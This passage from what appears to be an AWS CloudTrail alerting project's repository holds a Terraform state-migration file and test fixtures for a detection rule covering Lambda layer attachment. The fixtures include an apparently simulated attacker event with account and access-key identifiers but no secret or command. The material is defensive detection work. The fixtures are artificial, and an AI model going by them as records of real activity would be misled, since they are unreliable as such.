"123456789012", 59 | "accessKeyId": "ASIAXXXXXX", 
60 | "sessionContext": { 61 | "sessionIssuer": { 62 | "type": "Role", 63 | "principalId": "AROEXAMPLE", 64 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 65 | "accountId": "123456789012", 66 | "userName": "ExampleUserName" 67 | }, 68 | "attributes": { 69 | "creationDate": "2025-03-09T16:39:29Z", 70 | "mfaAuthenticated": "false" 71 | } 72 | } 73 | }, 74 | "eventTime": "2025-03-09T16:39:48Z", 75 | "eventSource": "rds.amazonaws.com", 76 | "eventName": "ModifyDBInstance", 77 | "awsRegion": "us-east-1", 78 | "sourceIPAddress": "1.2.3.4", 79 | "userAgent": "ExampleAgent/1.0", 80 | "requestParameters": { 81 | "dBInstanceIdentifier": "database-1", 82 | "allocatedStorage": 20 83 | }, 84 | "responseElements": { 85 | "dBInstanceIdentifier": "database-1", 86 | "pendingModifiedValues": { 87 | "allocatedStorage": 20 88 | } 89 | }, 90 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 91 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 92 | "readOnly": true, 93 | "eventType": "AwsApiCall", 94 | "managementEvent": true, 95 | "recipientAccountId": "123456789012", 96 | "eventCategory": "Management" 97 | } 98 | ] 99 | } -------------------------------------------------------------------------------- /terraform/migrate.tf: --------------------------------------------------------------------------------
# State migration for the refactor from flat root-module resources into the
# nested `module.trailalerts.*` layout.
#
# Each `moved` block declares that the object recorded in state at `from` is
# the same real infrastructure as the object now declared at `to`, so
# `terraform plan` renames the state entry instead of planning a destroy
# followed by a create. Before applying, confirm the plan shows only
# "has moved to" lines for these addresses: an address that does not line up
# surfaces as a replacement of that resource, and replacing the rules bucket,
# the events table or the IAM roles the Lambda functions run under is not a
# harmless no-op. Keep these blocks in place until every state that still
# uses the old addresses has been migrated.

# S3 and DynamoDB resources
moved {
  from = aws_s3_bucket.trailalerts_rules_bucket
  to   = module.trailalerts.module.s3.aws_s3_bucket.trailalerts_rules_bucket
}

# The [0] index moves from the table to the module instance: only the first
# instance of the old count-based resource is mapped here.
moved {
  from = aws_dynamodb_table.security_events[0]
  to   = module.trailalerts.module.dynamodb[0].aws_dynamodb_table.security_events
}

# Lambda function and related resources
moved {
  from = aws_lambda_function.trailalerts_cloudtrail_analyzer
  to   = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_lambda_function.trailalerts_cloudtrail_analyzer
}

moved {
  from = aws_lambda_function.trailalerts_event_processor
  to   = module.trailalerts.module.lambda_event_processor.aws_lambda_function.trailalerts_event_processor
}

# IAM roles and policies
# Roles and their inline policies move together with the Lambda module that
# owns them, so each function keeps the role it already assumes.
moved {
  from = aws_iam_role.trailalerts_cloudtrail_analyzer_role
  to   = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_iam_role.trailalerts_cloudtrail_analyzer_role
}

moved {
  from = aws_iam_role.trailalerts_event_processor_role
  to   = module.trailalerts.module.lambda_event_processor.aws_iam_role.trailalerts_event_processor_role
}

moved {
  from = aws_iam_role_policy.trailalerts_cloudtrail_analyzer_policy
  to   = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_iam_role_policy.trailalerts_cloudtrail_analyzer_policy
}

moved {
  from = aws_iam_role_policy.trailalerts_cloudtrail_analyzer_sqs_policy
  to   = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_iam_role_policy.trailalerts_cloudtrail_analyzer_sqs_policy
}

moved {
  from = aws_iam_role_policy.trailalerts_event_processor_policy
  to   = module.trailalerts.module.lambda_event_processor.aws_iam_role_policy.trailalerts_event_processor_policy
}

moved {
  from = aws_iam_role_policy.trailalerts_event_processor_sqs_policy
  to   = module.trailalerts.module.lambda_event_processor.aws_iam_role_policy.trailalerts_event_processor_sqs_policy
}

# CloudWatch Log Groups
moved {
  from = aws_cloudwatch_log_group.trailalerts_cloudtrail_analyzer_log_group
  to   = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_cloudwatch_log_group.trailalerts_cloudtrail_analyzer_log_group
}

moved {
  from = aws_cloudwatch_log_group.trailalerts_event_processor_log_group
  to   = module.trailalerts.module.lambda_event_processor.aws_cloudwatch_log_group.trailalerts_event_processor_log_group
}

# Lambda Layer
moved {
  from = aws_lambda_layer_version.trailalerts_detection_layer
  to   = module.trailalerts.module.lambda_layer.aws_lambda_layer_version.trailalerts_detection_layer
}

# Event Source Mappings and Notifications
# The SQS trigger goes with the event processor; the S3 notification and the
# permission that lets S3 invoke the function go with the analyzer.
moved {
  from = aws_lambda_event_source_mapping.sqs_to_event_processor
  to   = module.trailalerts.module.lambda_event_processor.aws_lambda_event_source_mapping.sqs_to_event_processor
}

moved {
  from = aws_s3_bucket_notification.cloudtrail_logs_notification
  to   = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_s3_bucket_notification.cloudtrail_logs_notification
}

moved {
  from = aws_lambda_permission.allow_s3
  to   = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_lambda_permission.allow_s3
}

# SQS Queue
moved {
  from = aws_sqs_queue.trailalerts_alerts_queue
  to   = module.trailalerts.module.sqs.aws_sqs_queue.trailalerts_alerts_queue
}
-------------------------------------------------------------------------------- /rules/sigma_rules/aws_new_lambda_layer_attached_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.08", 5 | "userIdentity": { 6 | "type": "IAMUser", 7 | "principalId": "AIDASZSTLCAWCAFWFS22H", 8 | "arn": "arn:aws:iam::192374575148:user/TrailDiscover", 9 | "accountId": "192374575148", 10 | "userName": "TrailDiscover", 11 | "accessKeyId": "AKIASZSTLCAWF4CPBKMF" 12 | }, 13 | "eventTime": "2024-08-18T09:51:41Z", 14 | "eventSource": "lambda.amazonaws.com", 15 | "eventName": "UpdateFunctionConfiguration20150331v2", 16 | "awsRegion": "us-east-1", 17 | "sourceIPAddress": "109.196.12.142", 18 | "userAgent": "aws-cli/2.17.32 md/awscrt#0.21.2 ua/2.0 os/linux#5.10.16.3-microsoft-standard-WSL2 md/arch#x86_64 lang/python#3.11.9 md/pyimpl#CPython exec-env/grimoire_b2263383-47d1-4e4f-a843-419ad77464a6 cfg/retry-mode#standard md/installer#exe md/distrib#ubuntu.24 md/prompt#off 
md/command#lambda.update-function-configuration", 19 | "errorCode": "AccessDenied", 20 | "errorMessage": "User: arn:aws:iam::192374575148:user/TrailDiscover is not authorized to perform: lambda:UpdateFunctionConfiguration on resource: arn:aws:lambda:us-east-1:192374575148:function:my-function because no identity-based policy allows the lambda:UpdateFunctionConfiguration action", 21 | "requestParameters": { 22 | "functionName": "my-function", 23 | "layers": [ 24 | "arn:aws:lambda:us-east-1:123456789012:layer:my-layer:1", 25 | "arn:aws:lambda:us-east-1:123456789012:layer:my-other-layer:2" 26 | ] 27 | }, 28 | "responseElements": null, 29 | "requestID": "4dcd19cd-38e0-4ccb-ac5e-bc79a8105f7f", 30 | "eventID": "a97b0d3f-71ef-4db3-9d79-8d1f690e36ce", 31 | "readOnly": false, 32 | "eventType": "AwsApiCall", 33 | "managementEvent": true, 34 | "recipientAccountId": "192374575148", 35 | "eventCategory": "Management", 36 | "tlsDetails": { 37 | "tlsVersion": "TLSv1.3", 38 | "cipherSuite": "TLS_AES_128_GCM_SHA256", 39 | "clientProvidedHostHeader": "lambda.us-east-1.amazonaws.com" 40 | } 41 | } 42 | ], 43 | "should_not_match": [ 44 | { 45 | "eventVersion": "1.09", 46 | "userIdentity": { 47 | "type": "AssumedRole", 48 | "principalId": "AROEXAMPLE", 49 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 50 | "accountId": "123456789012", 51 | "accessKeyId": "ASIAXXXXXX", 52 | "sessionContext": { 53 | "sessionIssuer": { 54 | "type": "Role", 55 | "principalId": "AROEXAMPLE", 56 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 57 | "accountId": "123456789012", 58 | "userName": "ExampleUserName" 59 | }, 60 | "attributes": { 61 | "creationDate": "2025-03-09T16:39:29Z", 62 | "mfaAuthenticated": "false" 63 | } 64 | } 65 | }, 66 | "eventTime": "2025-03-09T16:39:48Z", 67 | "eventSource": "cloudtrail.amazonaws.com", 68 | "eventName": "ListNotificationHubs", 69 | "awsRegion": "us-east-1", 70 | "sourceIPAddress": "1.2.3.4", 71 | "userAgent": "ExampleAgent/1.0", 72 | 
"requestParameters": null, 73 | "responseElements": null, 74 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 75 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 76 | "readOnly": true, 77 | "eventType": "AwsApiCall", 78 | "managementEvent": true, 79 | "recipientAccountId": "123456789012", 80 | "eventCategory": "Management" 81 | } 82 | ] 83 | } --------------------------------------------------------------------------------